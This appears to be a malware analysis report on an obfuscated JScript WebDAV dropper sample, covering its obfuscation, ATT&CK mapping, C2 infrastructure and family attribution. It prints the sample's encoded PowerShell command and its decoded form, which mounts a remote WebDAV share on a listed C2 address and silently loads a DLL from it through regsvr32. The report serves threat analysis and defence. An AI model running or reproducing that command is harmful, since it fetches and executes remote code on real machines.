familyunclassified-js-webdav-dropperconfidencehighcreated2026-07-24
SHA-256: 8ac4b873a5178bc3a3de28166e1e020aa6b49e2748f5cd1a30b4e3fc9ae67423

Analysis — 8ac4b873a5178bc3a3de28166e1e020aa6b49e2748f5cd1a30b4e3fc9ae67423

Sample: 280262701465664713.js ^[triage.json] Size: 80,589 bytes ^[triage.json] Family: unclassified-js-webdav-dropper (99th confirmed sibling)

Build / RE

  • Language: JScript (Windows Script Host) delivered as .js. ^[file.txt]
  • Obfuscation: Pure-JScript noise-variable concatenation obfuscation. 64 unique identifiers with random lowercase noise names (12–16 chars, no semantic content), assigned single-character values via semicolon-delimited var=... statements, then concatenated via + inside nested Function("return this")() constructors to build and execute the payload. Total assignments: 197 (64 unique identifiers, ~3:1 reassignment ratio, last-wins semantics). No dictionary lookup table, no batch/polyglot layer, no self-replication. ^[strings.txt] ^[floss.txt]
  • Assembly engine: Function("return this")()["WScript"]["CreateObject"]("WScript.Shell")["run"](...). ^[floss.txt]
  • Anti-analysis: timeout 1 anti-emulation gate inside the PowerShell wrapper (delays execution before net use). No debugger checks, no VM detection. ^[dynamic-analysis.md]
  • Code quality: Low — hand-written, verbose, repetitive noise-variable obfuscation without commercial obfuscator signatures.

Deploy / ATT&CK

Decoded cleartext payload (static reconstruction via tokenized variable substitution):

powershell -EncodedCommand dABpAG0AZQBvAHUAdAAgADEAOwBlAGUAZQB1AGEAagBqAHcAawBhADsAbgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4AMgAwADQAQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADsAcwBlAG4AcABrAHMAZAB1AHAAeQBpAHkAawBjADsAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcADkANAAuADEANQA5AC4AMQAxADMALgAyADAANABAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMQA3ADAAOAAzADIAMgA3ADUANgA4ADgAOQAuAGQAbABsADsAawBjAG0AYQB5AG8AaQBqAGUAYQB3AA==

which decodes (UTF-16LE) to:

timeout 1;eeeuajjwka;net use \\94.159.113.204@8888\davwwwroot\;senpksdupyiykc;regsvr32 /s \\94.159.113.204@8888\davwwwroot\1708322756889.dll;kcmayoijeaw
Tactic Technique Evidence
Execution T1059.005 (Visual Basic / JScript) .js file opened by user; WScript host ^[file.txt]
Execution T1059.001 (PowerShell) powershell.exe -EncodedCommand wrapper ^[floss.txt]
Execution T1218.010 (Regsvr32) regsvr32 /s \\94.159.113.204@8888\davwwwroot\1708322756889.dll ^[floss.txt]
Defense Evasion T1218 (System Binary Proxy Execution) wscript.exe → powershell.exe → regsvr32.exe proxy chain ^[floss.txt]
Defense Evasion T1027 (Obfuscated Files or Information) Noise-variable concatenation obfuscation (64 entries, 197 assignments) ^[strings.txt]
Defense Evasion T1497.001 (Time-Based Evasion) timeout 1 anti-emulation gate inside PowerShell wrapper ^[dynamic-analysis.md]
Command & Control T1071.001 (Web Protocols) WebDAV over HTTP (\\94.159.113.204@8888\davwwwroot\) ^[floss.txt]
Command & Control T1105 (Ingress Tool Transfer) net use mounts WebDAV share; regsvr32 fetches and loads remote DLL ^[floss.txt]

C2 infrastructure: 94.159.113.204:8888 — same C2 subnet as siblings fa8c6d74 (65th, .204), ddf0c8bd (80th, .204), edfb0e0a (85th, .204), 82d78891aa (93rd, .204), and 771c8752 (90th, .204). ^[entities/unclassified-js-webdav-dropper.md]

Payload: 1708322756889.dll — registered silently via regsvr32 /s.

Dynamic Analysis

CAPE skipped — ASCII text with very long lines is not a supported binary class for detonation. ^[dynamic-analysis.md]

Attribution

  • Family: unclassified-js-webdav-dropper — 99th confirmed sibling.
  • Confidence: High — identical execution engine (Function("return this")() → WScript.Shell.run() → PowerShell -EncodedCommand → net use + regsvr32 /s), same C2 subnet (94.159.113.204:8888), same noise-variable concatenation dialect (64 entries).
  • No new technique — falls within established noise-variable-jscript-concatenation-65-entry capability cluster (same dialect as fa8c6d74, ddf0c8bd, edfb0e0a, 82d78891aa).